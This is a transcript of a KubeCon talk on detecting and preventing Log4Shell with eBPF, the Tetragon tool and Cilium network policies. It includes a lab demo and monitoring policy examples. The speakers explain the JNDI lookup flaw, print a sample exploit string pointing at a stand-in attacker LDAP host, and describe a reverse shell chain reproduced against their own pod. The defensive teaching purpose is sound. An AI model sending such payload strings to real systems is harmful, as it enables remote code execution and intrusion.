Hello, everyone, and welcome to the last day of KubeCon. Thank you for coming. Today we will talk about the next Log4Shell, and how we can prepare for these CVEs with the help of eBPF. So who is speaking today? My name is Natalia Ivanko. I'm a security product lead at Isovalent. And here with me is John, a staff engineer and a Cilium maintainer at Isovalent. A little bit about the agenda: we will start with the motivation, a quick recap of what Log4Shell is, just as a one-on-one, because I'm not a Java developer and cannot go into very deep detail. Then we will see why eBPF is the optimal solution to detect it, look at an open source tool, Tetragon, dive into how this solution would pick up Log4Shell, and show a demo. And I will finish with some further detection and prevention techniques: how could we detect the next Log4Shell? Because there will be many more coming.

So let's start with a quick one-on-one. What is Log4Shell? It's a vulnerability in a Java logging library, Log4j, which is licensed under Apache 2, and it allows remote code execution. Basically, an attacker who can control the log messages going into a vulnerable application is able to execute arbitrary code. And of course it affects a wide range of products, servers, and vendors.

So why does this vulnerability exist? It's due to three features, or bugs, whatever you want to call them. Two of them are in Log4j itself, and the third is actually a Java feature. The first: the Log4j library allows you to log messages from sources that you don't control. For example, if you're receiving data in your application, it lets you log user names, passwords, error codes, return codes, and so on. The second: it also allows you to log things like environment variables. If you write ${java:version}, it will log the Java version; you could ask for the OS version, and it would log the OS version. And what's interesting is that it does this recursively: if the resolved string itself contains another ${...} lookup, Log4j will resolve and log that as well. The third, the JNDI feature, is actually a Java feature. It allows you to look up information on other servers. For example, you can do DNS lookups or LDAP lookups: you put in an LDAP server address, and Log4j will connect to that server, look up the information, return it, and log what was looked up. And what's interesting is that the lookup can return a Java object. If the information on the LDAP server is a Java object, Log4j will fetch that Java object, and the JVM will happily run it. So if I'm a crafty individual, I can set up my own LDAP server, put my Java class file there, and send that string to a vulnerable Log4j application. So what would happen then?
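To make the lookup syntax concrete, here are a few illustrative strings (the attacker hostname and class name are hypothetical):

```
${java:version}    resolves to the running JVM version
${env:HOSTNAME}    resolves to an environment variable

${jndi:ldap://attacker.example.com:1389/Exploit}
                   makes Log4j connect to the attacker's LDAP server,
                   which can hand back a Java object that the JVM runs
```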
So let's say I'm an attacker. I figure out that there is a vulnerable web application exposed to the internet: it has a static IP, it sits behind a load balancer, and it's running a vulnerable Log4j version. I set up my LDAP server and put my malicious Java class on it, and I also have another server with a netcat listener. Now I send the malicious string to the vulnerable application. Log4j will parse that string, resolve the IP address, and connect to the LDAP server. The server responds, and since I put a malicious Java class there, it responds with that Java class. The web application with Log4j will execute that Java class and run the code I put in the class file. If that code is a reverse shell, it will connect back to my other machine and start the shell. And after that, I can do basically whatever I want.

So why is it so powerful? It's very easy to exploit: you just pass that string, pointing at a domain you set up, to an application, and you can run arbitrary code. I'm not a Java developer, but when I was talking to my friends, the takeaway was that this library is almost everywhere. If you are using Java, you are probably using this logging library. Let me know if I missed anything.

So what can detection and response teams, or security teams, do in this case? Of course, they need to identify and patch the affected systems, but that takes a very long time. Until the patching is completed, they need to answer questions like: how can we detect which software is unpatched? If it's unpatched, how can we make sure our Kubernetes workloads and servers are running safely? And if they are not safe, how can we detect whether we have been compromised? To answer those questions, we need a low-overhead, real-time solution that provides observability into our Kubernetes workloads, and it needs to be dynamic. That's where eBPF comes into the picture.

Great. Hi, good morning. So I have about 10 or 15 minutes, and I'm going to try to convince you that BPF is the right technology for this problem. Hopefully I can convince you of that very quickly, and then we'll look at how to build up the right infrastructure to detect these kinds of CVEs in your cluster, all right? First, if you don't know what BPF is (there have been a few talks about it), I'll give you the quick, high-level overview. What does it do? Primarily, it lets us extend the Linux kernel. Before BPF, if you were a kernel developer like myself, you had to write some kernel code, submit it to the kernel community, get that patch in, and then wait a long time, because the code has to land upstream and then make it into a vendor kernel, and your vendor might take a couple of years. By the time your patch is out there doing the stuff you wanted, it's unlikely many people care anymore, and you might be off doing something else. So BPF gives you the ability to write some C code, with some constraints, of course, because it needs to be safe when it's put into the kernel.
The kernel can't crash, and your code can't run forever and starve the rest of the jobs on the scheduler, and so on. The BPF core will ensure those properties for you. You write your little C program, you load it into the kernel, and you've basically extended the kernel at that point. What's nice is you can hook almost anywhere in the kernel; most kernel functions can be hooked. If you're in the networking space, we have some performant hooks. If you're in the security space, we have the LSM hooks, which are security hooks at well-known security checkpoints in the kernel. So that's BPF in a nutshell.

The other two nice properties for this particular problem are these. First, it's minimally invasive, meaning it's fairly performant: it's basically one extra function call when you're in the kernel. If you imagine the TCP stack with everything it's doing, one extra function call is going to be barely noticeable. Second, it's dynamic, which is quite useful when you have big clusters, or many clusters. Maybe you have 10,000-plus nodes and you want to roll out an update to your BPF program to recognize a new CVE. You can do that, swapping the BPF programs on the fly without having to reboot your nodes, sometimes without even having to restart your management pod, and definitely without having to restart the pods that are your workloads. Everything keeps running and you get a seamless update. So that's my BPF pitch.

What are some questions that our observability platform would like to ask? We want to know what binaries are running in our system, where "system" in this context can be your Kubernetes cluster, your virtual machines, or your bare metal. If you're building up this observability platform, you want to know everything that runs in that cluster; this tells you when things are running that aren't expected. You want to know what versions are being run, and not just the versions of the binaries but the versions of the libraries too, because a Kubernetes pod might be linking against an old version of OpenSSL. I want to know that; I want to make sure my libraries are patched up to date. I want to know all the network connections. Imagine a pod spins up, runs happily for an hour or two, and then all of a sudden starts making a remote connection out to some S3 bucket. You might want to know that; it sounds a little suspicious. TLS compliance is another big one we see a lot: I want to know whether TLS is being used, whether IPsec is being used, WireGuard, whatever. I want those encryption policies in place, and I want to be able to observe them at runtime and make some guarantees.

So here's a list of things. And of course, if you're someone who writes this software, customers will tell you: I want it in real time, or close to real time, with microsecond and millisecond time bounds; don't use very much CPU; and don't use a whole lot of memory either. If you're running a cluster, you're on the other end of that, telling folks like me: please don't use too much CPU, please don't use too much memory, and please feed my pipeline in close to real time. So we have these constraints and a bunch of questions we'd like to ask.
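To give a flavor of what writing and loading that little C program looks like, here is a minimal sketch in libbpf CO-RE style. It is illustrative only, not Tetragon source code: it attaches a kprobe to the kernel's tcp_connect function and prints the destination port of every outbound TCP connection.

```c
// SPDX-License-Identifier: GPL-2.0
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
#include <bpf/bpf_core_read.h>
#include <bpf/bpf_endian.h>

char LICENSE[] SEC("license") = "GPL";

// Runs every time the kernel initiates an outbound TCP connection.
// The BPF verifier guarantees this cannot crash the kernel or loop forever.
SEC("kprobe/tcp_connect")
int BPF_KPROBE(trace_tcp_connect, struct sock *sk)
{
    __u16 dport = BPF_CORE_READ(sk, __sk_common.skc_dport);
    __u32 pid   = bpf_get_current_pid_tgid() >> 32;

    // A real tool would push an event into a ring buffer;
    // bpf_printk just writes to the kernel trace pipe for demo purposes.
    bpf_printk("pid %u: tcp_connect to port %u", pid, bpf_ntohs(dport));
    return 0;
}
```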
Due to limited time, we're not going to go through every one of these, so I highlighted a few that we'll walk through, and that Natalia will then show you in the demo: what's running, what libraries are loaded, what network connections we're making, and any file access (read, write, open). That gives us a good baseline framework for building an observability platform.

We're going to base this on Tetragon. Tetragon is under the Cilium umbrella of projects; it's the runtime observability and security piece. I'm one of the maintainers; there's a whole bunch of people who work on this, a few of them at Isovalent, a few of them not. It's an open source project: if you go to github.com/cilium, it'll be under that umbrella. Basically, it gives you a framework for hooking into the kernel at all these various access points, plus a mechanism to pull those events out of the kernel once they've been filtered in the kernel. That filtering is important, because as you'll see in a couple of minutes, you could get a lot of data out of the kernel here if you wanted to. The events are also aggregated so we get smart metrics: we're not just dumping everything the kernel ever does up to user space; we're collecting heuristics, histograms, and stats in the kernel and exporting only what's useful to the agent. The agent can then interact with the world: Prometheus metrics, JSON logs, gRPC, a whole series of ways to get this data off the system, depending on what backends you're running.

So let's dive in. First, we want executable tracing: we want to see every process that runs in the system, and Tetragon provides that. It emits a JSON event when something gets executed. On the right is a mockup of what you might build from this: an execution tree. You see Java there; we see a lot of Java applications, and they're interesting in how they execute lots of children and how the JVM works, so you want to trace all of that. On the left is an example of what the JSON output might include. I slimmed it down; Tetragon can expand or shrink that structure based on what information you need. The exec ID is interesting because it gives you a unique ID for an execution in the system: anywhere in my cluster, I want a unique ID for that specific execution. You might also have a SHA-256. Binary names are not particularly secure, so it's quite nice to say: this is the digest of the binary that executed. There's the PID and a lot of the other useful things from Linux, and a bunch of pod information you can include: the container, the runtime, the namespace, all of your normal Kubernetes metadata. And, interesting for this talk, you also have the timestamp. So you can push this into a database, and now you have what executed, a unique ID for it, and a time, which lets you build a time-series database. You can go back and forth in time and ask what executed a month ago, or what executed five minutes ago. You can do more complex things, like diffing the two: I want to see what my pod ran yesterday versus what my pod ran today. Maybe that's the empty set, or maybe there's some extra stuff in there that you should be paying attention to.
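For reference, a slimmed-down execution event looks roughly like this. The field layout follows Tetragon's JSON export format; the concrete values here are made up:

```json
{
  "process_exec": {
    "process": {
      "exec_id": "Z2tlLW5vZGUtMTo0MjE3NTY0MzI2OjUyNDE=",
      "pid": 5241,
      "binary": "/bin/sh",
      "arguments": "-c \"curl attacker.example.com\"",
      "start_time": "2023-04-21T10:32:15.123Z",
      "pod": {
        "namespace": "tenant-jobs",
        "name": "java-web-app",
        "container": { "name": "java-web-app" }
      }
    },
    "parent": {
      "exec_id": "Z2tlLW5vZGUtMTozOTc1NjQzMjY6NDgwMA==",
      "binary": "/usr/bin/java"
    }
  }
}
```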
This little flower picture here is just that mockup, with some real data pulled in from one of our test clusters, zoomed out. Basically, what you see is every executable in our cluster on one graph. If you were to zoom in, each one of those clusters is actually a pod (you can imagine a pod's executables are all related to each other), and you could see their names and details if you clicked on them. It's a fun picture for a talk.

So we have executable traces now, and I have five minutes left, so that's good. The next thing we want to know about is libraries: I want to know what I'm pulling in. Here's an example. Again, you get the exec ID, which points you back to the original process, and you can say: this process has these libraries associated with it. I know by the SHA that this library is one of my good libraries; I know by the SHA that this one is unpatched. Again, there's a timestamp, so I can go forward and backward in time and ask: is this library patched or not? I know the digest of my patched library and the digest of my unpatched library, so I can look at my runtime and see if anything running is using an unpatched library.

Now think about how we pull this data out; the last slide was the raw JSON. There are a couple of ways to do that. You can put it in a database and run queries over it, SQL queries. The bottom is an example of a Splunk query; if you've done Splunk before, that should look familiar: you define fields and names and run a query over a database. If you don't want to store that much data, we can compress it down, and that's what the metrics at the top are: just the binary name and the namespace. In this particular example it was something running on the host, so it doesn't have a pod; if it were running in a pod, the pod name and namespace would be there.

So now we have everything that's executed and all of the libraries. The next thing to ask in this context is: what are we connecting to? What are the network connections in the system? That's what the network connectivity observability does: we can monitor connects, listens, and accepts. What's interesting here, from a Tetragon standpoint, versus say a middlebox running in the actual networking data path, is that it's done at the socket level. We see sockets; we're not intercepting packets. That has some advantages, especially when you think about listening sockets. Imagine something opens a listening port. If you're in the actual data path, you wouldn't know about it until a packet was actually received or sent. With something like Tetragon, monitoring the runtime at the socket level, you can say: just give me a list of everything that's listening in my cluster. Maybe the thing that's listening hasn't even been talked to yet; there's no data flowing, there's just a socket in your system.

The last piece here is file integrity monitoring; we call it FIM. The idea is that I now know my executables, my libraries, and my network connections.
The next thing I want to know is my files. What am I opening? What am I reading? What am I writing? This one is particularly interesting, because when you build a system like this, your first attempt might be: let me just monitor all of the sys_open, sys_write, and sys_read calls. You'll quickly realize that a Linux system does a lot of stuff with files. Everything is a file: open, close, read, write. You'll very quickly spam your backend, or your SIEM, depending on what you have in that pipeline; it's going to get a lot of file data. So one of the nice things about Tetragon is that you can build the filters you see here at the bottom. There are a lot of different ways to do this (we have equality tests, substrings, and so on), but the basic idea is you can say: I only want to monitor files in this directory, or I want to monitor one specific file, and only for a specific operation, maybe just writes. I don't care if you read it. /etc/passwd is a good example: lots and lots of things will read /etc/passwd, but very few things should be writing to it. SSH keys are another example: if your pods are writing to SSH keys, maybe that's not expected. The host filesystem is another one: maybe it's okay for a pod to read the host filesystem, but you probably don't want your pods writing to it. Those are the kinds of policies you can put in Tetragon. They get loaded down into the kernel, so we keep the low-overhead property, and we also use less memory in the data stream, because we're compressing down to only the events you really, really care about.

Finally, the last piece I want to mention is that Tetragon can enforce things. This lets you say: when I see this particular event, maybe that write to /etc/passwd, I want to stop the action, kill the process, freeze the pod, so an operator can come back later and figure it out. The key point, from Tetragon's perspective, is that this is done inline with the kernel. The event happens while the call is being made into the kernel; we block that call, stop it from running in the kernel, and then take the action. Compare that with a model where you just generate the event and enforce from user space: if it's a write to /etc/passwd, we want to make sure that write never actually happens, versus an async system where the write happens first and then you stop the pod, which is after the fact.

Coming back to performance for a moment: this is a benchmark we have in the repo, so you can run it yourself. The absolute time doesn't particularly matter, but basically we compile the kernel a whole bunch, which is an interesting stress test because it creates a lot of files, opens and closes a lot of files, and executes a lot of things. What you can see there is: the top row, the base monitoring of all the library loads and executables, is less than 5% overhead. With syscall monitoring, less than 10% overhead. And that 23% row is what I said you probably don't want to do: monitoring every file read and write in the system. That's the worst case.
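As an illustration, a Tetragon tracing policy in this spirit might hook the security_file_permission LSM check, match only writes to /etc/passwd, and kill the offending process inline. This is a sketch based on Tetragon's TracingPolicy format; the hook choice, argument indexes, and access-mask value are assumptions that vary across versions, so treat it as a shape rather than a drop-in file.

```yaml
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: deny-etc-passwd-writes
spec:
  kprobes:
  - call: "security_file_permission"   # LSM check performed on file access
    syscall: false
    args:
    - index: 0
      type: "file"                     # the file being accessed
    - index: 1
      type: "int"                      # access mask (read vs. write)
    selectors:
    - matchArgs:
      - index: 0
        operator: "Equal"
        values:
        - "/etc/passwd"                # only this file, ignore everything else
      - index: 1
        operator: "Equal"
        values:
        - "2"                          # assumed MAY_WRITE: reads never leave the kernel
      matchActions:
      - action: Sigkill                # enforce inline: kill the writing process
```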
We don't actually use that worst-case monitor-everything policy in production, but it highlights the need for in-kernel filtering and in-kernel aggregation. Okay, so these are the things we've talked about. I'm not going to go through them again, but it's a nice summary. And now Natalia is going to walk you through this workflow to determine whether we've been exploited, using Tetragon to detect it. Go ahead.

Cool, so let's dive into a quick demo. I will be very quick because we don't have much time. For the test environment, I'm using a GKE cluster, very simple. It has one node running Ubuntu 22.04.1 LTS with a 5.15 kernel. Tetragon is running as a DaemonSet, and I have the vulnerable web application as a pod, a Java web app pod, running in the tenant-jobs namespace. I also have the LDAP server, where I put the malicious Java class file, and the netcat listener on that same node. What we will see is the exploitation of the web application: I'm going to send a well-crafted string, Log4j will parse it, and the Java class file will execute a reverse shell that the netcat listener picks up. From that reverse shell, I will list some environment variables and read some sensitive files.

So this is how it looks. Tetragon can of course run in a multi-node cluster; right now I'm using one node, and it's running as a DaemonSet. As we mentioned, we are observing process executions, network connections, and sensitive file access. All these events are exported as JSON events, and they contain, for example, Kubernetes identity-aware metadata, process visibility information, network connection information, and DNS metadata. For further investigation, you can export them to a SIEM system like Elasticsearch or Splunk, or to S3, for later incident investigation. Or, for quick demos, you can use our CLI, which parses these events.

Here's the setup: I have the Java web app pod in the tenant-jobs namespace, with an external IP I can open from the browser, plus the LDAP server and the netcat listener. Let me switch to the terminal quickly. I can check that the Java web app pod is running; we see that it's up and running, and I can open it from the browser, here on the bottom terminal. Then I set up the LDAP server on the top. Let's take a moment to appreciate what's actually written here: I set up the LDAP server, created the malicious Java class file, and put it on the server, and it generated a string that I can paste into the browser to trigger the exploit. I took this POC from a GitHub repository, kozmer's log4j-shell-poc; very good for testing purposes. Let me start the netcat listener in the middle, and start observing the events from Tetragon. All right, let me paste the string, and I can say: welcome to Amsterdam. Click on login. What we can see here at the top (I clicked login twice, so we see the execution twice) is that it connected to the LDAP server. We can see that the request was successful; it returned a 200.
We can see that the Exploit.class was downloaded, and we can see the connection received on the netcat listener: this is the reverse shell that was executed by the Java class file. Now let's look at the Tetragon events. What we see here is the connect event: there was a connection from the Java web app pod in the tenant-jobs namespace, reaching out to the LDAP server. What's interesting is that on the close event we also report statistics, so we can see that 1,600 bytes were downloaded, which is the Java class file. We can also see the Kubernetes identity-aware information, so we have an idea of where this external connection came from. And what's also interesting: here is the /bin/sh, the reverse shell execution, so we pick that up as well. Let me list some environment variables: we can see that we are inside the Java web app pod, and we can see the process execution as well as the exit event. And I can read /etc/passwd as an example: we see an execution event, an exit event, and then open and close events on /etc/passwd. All right, let me go back.

Great. So how could a security team use this in a real-world scenario? You could export those JSON events into a SIEM system and create signatures, for example for late process execution. You would know that no external connection should have been made from the Java application five minutes after the container started; that's super suspicious. Or there should be no shell execution: the Java application should never have shelled out five minutes after the container started. Two quick examples; I will show a dashboard later on. This is a Splunk signature for late process execution; it would pick up the external reach-out from the Java application, and the shell as well. And this is the Splunk query for shell execution; it would also pick up, for example, my kubectl exec just now. If you have a workload and you, or someone else on your team, kubectl exec into it, that's also something to consider.

All right, I prepared a dashboard. What we see at the top is the Java web app container starting, and then, five minutes later, an external reach-out that downloaded 1,600 bytes. If we start to investigate, we see that this was the Java web app pod in the tenant-jobs namespace, that the parent process was the java binary, and that it actually executed a shell. At the bottom, we can see what other processes were executed by the shell: there was a read of /etc/passwd, there was a write, and there was some listing of existing directories.

As a last step, for prevention, we should apply the least-privilege principle to network connections: allow only the network connections your application needs, and no more. For this, we can take advantage of Cilium network policies, and basically two features. The first is DNS-based policies, which allow traffic based on DNS names instead of IPs and CIDRs.
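A sketch of what such a DNS-based policy could look like, assuming a pod labeled app: java-web-app (a hypothetical label), and noting that FQDN rules also need a DNS rule so Cilium can observe the lookups:

```yaml
apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: allow-twitter-api-only
spec:
  endpointSelector:
    matchLabels:
      app: java-web-app            # hypothetical pod label
  egress:
  # Allow DNS lookups through kube-dns so FQDN rules can be resolved
  # and observed by Cilium's DNS proxy.
  - toEndpoints:
    - matchLabels:
        k8s:io.kubernetes.pod.namespace: kube-system
        k8s-app: kube-dns
    toPorts:
    - ports:
      - port: "53"
        protocol: ANY
      rules:
        dns:
        - matchPattern: "*"
  # Allow traffic only to this DNS name, nothing else.
  - toFQDNs:
    - matchName: "api.twitter.com"
```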
So you can say: my application should communicate only with api.twitter.com and nothing else. The second feature is deny policies, also a Cilium network policy feature, which define a set of destinations that will be denied while other network traffic is allowed. And we can take advantage of the "world" entity, which matches hosts on the internet. So here is a quick example of how we could prevent this: the first Cilium network policy allows connections only to api.twitter.com, and the second, the deny policy, denies connections to everything else.

All right, so we are still on time and wrapping up. What did we see today? We saw a very quick intro to Log4Shell as a one-on-one. We saw why eBPF is the optimal solution for this; I think John covered that pretty clearly. We saw a quick demo of how we could pick this up with an existing open source tool, Tetragon. And we saw further detection and prevention techniques: the late process execution and shell execution signatures in Splunk, and the prevention with network policies. Yeah, so if you're interested, how can you contribute? Yeah, go ahead. So: go to the GitHub repository, join Slack, use the tool, report bugs, create feature requests, add your use cases, improve documentation. We have a lot of work across the layers of the stack, so it's not only eBPF code you can contribute: there's Go code, Kubernetes integration, documentation, packaging, and so on. And we still have some time, so I would open it up for Q&A. Thank you for coming.

I think there's a question in the front here, if there's a mic anywhere. Hi, thank you for your presentation. I have a question: with a couple of colleagues, we are currently trying an alpha Kubernetes feature, container checkpointing, where you can basically take a snapshot, a picture of the current state of your container, including the RAM, et cetera. Tetragon is more for runtime; can we imagine using Tetragon for forensic analysis, or post-mortem forensic analysis? Yeah, so I think there are a couple of efforts in this space that I know about. There's a group of folks working on plugging it into their GitHub Actions, where they run the pod and get a snapshot of the events you want to have: what do I connect to, what files open, what executes. They basically build a trace from that, and once you have the trace, you can take it and build a policy, kind of automate a policy from it, and then enforce it. So that's one approach. I know some people are now working in the SBOM space, on something very similar to an SBOM, but then enforced. And there's another idea people are thinking about right now: if we publish well-known images, like nginx or SQL or whatever, pick your favorite thing, we could ship them with what we know they do. Some things we just understand well enough to say these are the things that execute, because that's what we put in the entry point, you know?
And so you could build that policy as part of the image and package them together, so that when the image gets deployed, you automatically apply the policy behind it, or probably in front of it actually, so you don't have a race. Then you get the property you're looking for: a known image along with a known policy that restricts it. Yeah, good. Is there another question? Phil? Thank you, thank you. Yeah, perfect. I'm looking into the light, so: are there any other questions? I'll take a couple of steps back so I can see better. If not, come find us; we'll be around today. I'm either at the Cilium booth or the Isovalent booth, or just come on up and chat with us for a little bit. We'll be around for a while. Thank you. Yeah, thanks a lot.